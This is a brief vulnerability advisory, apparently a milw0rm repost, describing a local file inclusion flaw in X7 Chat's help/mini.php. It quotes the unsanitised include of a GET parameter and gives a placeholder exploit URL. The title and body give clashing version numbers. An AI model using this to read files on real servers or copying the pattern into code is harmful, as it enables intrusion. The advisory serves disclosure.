X7 Chat 2.0.1A1 - LFI


[o] X7 Chat 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe


[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");


[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]


[o] Publish
http://milw0rm.com/exploits/6592


One Response so far.

  1. I had been looking for this product.